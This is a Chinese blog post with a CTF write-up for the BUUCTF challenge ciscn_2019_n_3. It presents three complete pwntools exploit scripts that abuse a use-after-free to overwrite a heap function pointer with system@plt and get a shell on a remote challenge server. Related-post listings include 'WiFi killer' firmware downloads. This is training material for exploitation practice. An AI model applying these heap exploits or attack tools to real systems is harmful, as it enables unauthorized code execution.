[BUUCTF-pwn]——ciscn_2019_n_3

最新推荐文章于 2023-02-04 19:49:03 发布
最新推荐文章于 2023-02-04 19:49:03 发布
阅读量3k 收藏 1
点赞数
分类专栏: # BUUCTF # 堆利用 文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/121438504
版权

[BUUCTF-pwn]——ciscn_2019_n_3

  • 结构体:
//该结构体仅仅是选择字符串的时候的结构体
struct chunk
{
	void *rec_str_print();
    void *rec_str_free();
    char *str;
}

//该结构体仅仅是选择数字的时候的结构体
struct chunk
{
	void *rec_int_print();
    void *rec_int_free();
    int number;
}

这道题目就是简单的uaf漏洞利用,由于system已经给你了,所以连泄露地址都给你省了。很时候新手练习uaf。简单来说,就是通过堆漏洞将rec_int_free或者rec_str_free给需要为system。或者将rec_str_free给修改为system

一个不知道为什么不可以的payload, 感觉良好觉得非常可以,但是就是不行。希望有大神可以解惑一下啊

from pwn import *

context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")

def new(index,length,content):
	p.recvuntil("CNote > ")
	p.sendline('1')
	p.recvuntil("Index > ")
	p.sendline(str(index))
	p.recvuntil("Type > ")
	p.sendline('2')
	p.recvuntil("Length > ")
	p.sendline(str(length))
	p.recvuntil("Value > ")
	p.sendline(content)
def delete(index):
	p.recvuntil("CNote > ")
	p.sendline('2')
	p.recvuntil("Index > ")
	p.sendline(str(index))

def show(index):
	p.recvuntil("> ")
	p.sendline('3')
	p.recvuntil("> ")
	p.sendline(str(index))
	
new(0,0x40,'aaaa')
new(1,0x30,'bbbb')

delete(0)
delete(1)
payload = flat([b'aaaa',elf.plt['system']])  #看了一下网上其他人的教程将aaaa改为bash就可以了。虽然我也不知道为什么。
new(2,0xc,payload)
new(3,0x40,b'/bin/sh\x00')
delete(0)
p.interactive()

exploit

通过Integer进行利用

from pwn import *

context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")

def new(index,number):
	p.recvuntil("CNote > ")
	p.sendline('1')
	p.recvuntil("Index > ")
	p.sendline(str(index))
	p.recvuntil("Type > ")
	p.sendline('1')
	p.recvuntil("Value > ")
	p.sendline(str(number))


	


def delete(index):
	p.recvuntil("CNote > ")
	p.sendline('2')
	p.recvuntil("Index > ")
	p.sendline(str(index))

def show(index):
	p.recvuntil("> ")
	p.sendline('3')
	p.recvuntil("> ")
	p.sendline(str(index))
	
new(0,2)
new(1,2)
new(2,2)
delete(0)
delete(1)

payload = flat([b'sh\x00\x00',elf.plt['system']])

p.recvuntil("CNote > ")
p.sendline('1')
p.recvuntil("Index > ")
p.sendline('3')
p.recvuntil("Type > ")
p.sendline('2')
p.recvuntil("Length > ")
p.sendline(str(0xc))
p.recvuntil("Value > ")
p.sendline(payload)

delete(0)
p.interactive()

这个是可以利用成功的, 搞不明白为什么将’bin/sh’写入 0 的 string里面就不可以,通过text进行利用。和上面第一个不可以的exp明明是一个思路。搞不明白。

from pwn import *

context(log_level='debug',arch='i386')
#p = process('./ciscn_2019_n_3')
p = remote('node4.buuoj.cn',28062)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("./libc-2.27.so")

def new(index,length,content):
	p.recvuntil("CNote > ")
	p.sendline('1')
	p.recvuntil("Index > ")
	p.sendline(str(index))
	p.recvuntil("Type > ")
	p.sendline('2')
	p.recvuntil("Length > ")
	p.sendline(str(length))
	p.recvuntil("Value > ")
	p.sendline(content)
def delete(index):
	p.recvuntil("CNote > ")
	p.sendline('2')
	p.recvuntil("Index > ")
	p.sendline(str(index))

def show(index):
	p.recvuntil("> ")
	p.sendline('3')
	p.recvuntil("> ")
	p.sendline(str(index))
	
new(0,0x30,'aaaa')
new(1,0x30,'bbbb')

delete(0)
delete(1)
payload = flat([b'sh\x00\x00',elf.plt['system']])
new(3,0xc,payload)

delete(0)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 766
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
buuctf ciscn_2019_n_3
weixin_45677731的博客
08-31 260
do_new函数: 申请一个0xc大小的chunk,前四个字节存放的是输出函数的地址,中间四个字节存储的是删除函数的地址,最后四个字节,因数据类型的不同而不同 当你选择整数类型,最后四个字节存放的就是一个数字 当你选择文本类型,你就可以向程序请求申请一个一定大小的chunk用于存放文本,而最后四个字节存放的就是这个新的chunk的地址 do_dump函数: 输出内容 do_del函数: 发现free并未将指针置0,再看rec_int_free函数和rec_str_free函数,也没有置0,存在UAF的漏
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1769
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
ciscn_2019_ne_3
seaaseesa的博客
05-07 424
ciscn_2019_ne_3 (在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。 因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先...
ciscn_2019_n_3[use after free]
、moddemod
07-05 249
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def new_note(idx, _type, length, value): p.sendlineafter('CNote > ', str(1)) p.sendlineafter('Index > ', str(idx)) p.sendlin..
ciscn_2019_n_3 题解
lifanxin的博客
12-30 573
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
ciscn_2019_n_3 Writeup
Calllin的博客
05-10 414
前提 本程序中的释放堆块后未对堆块指针置空,从而可能引发UAF。 程序本身带有函数system(),可以直接使用system@plt的方式使用该函数。 涉及堆块结构的代码如下下文所示,第一种块大小固定位0x10(0x11),有一种块大小可控,最大为0x400。 //当堆块结构是integer时 *(_DWORD *)v3 = rec_int_print; *(_DWORD *)(v3 + 4) = rec_int_free; *(_DWORD *)(v3 + 8) = ask("Value"); //
ciscn_2019_n_3 writeup
SkYe's Blog
10-24 596
基本情况 这题被环境坑了一把,用的是 docker 环境做题,checksec 检测是保护全开,ida 分析时也没有留意地址都是真实地址,所以一直没想用 system@plt getshell 。。。后面才发现程序是关闭 PIE ,程序有 system ,直接调用不需要泄露 libc 操作。 程序是一个有增删查的堆管理器,根据存储资料的类型分为两类,对应结构体如下: struct int_chunk { void *rec_int_print(); void *rec_int_free();
ciscn_2019_n_3题目细说
Tw0的博客
02-04 173
修正一些exp讲解思路不对的地方,讲述真正getshell的原理。
[BUUCTF-pwn] ciscn_2019_ne_1
weixin_52640415的博客
01-08 220
2.27-i386 的堆很少见 4小时才完成,前边想得有点乱了。 堆块的结构: 总管理块0x31:10个块指针 头块0x21:ptr_comment,ptr_name,XXX,XXX两个没用的东西 name块:大小自定不能太大,这个块由scanf %ns 读入,多加\0 这个很隐蔽,一时没发现浪费不少时间。 comment块:0x8c 这个块由read读入后边不带\0,将来用于泄露libc 还有个改名的菜单,转了好...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3558
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值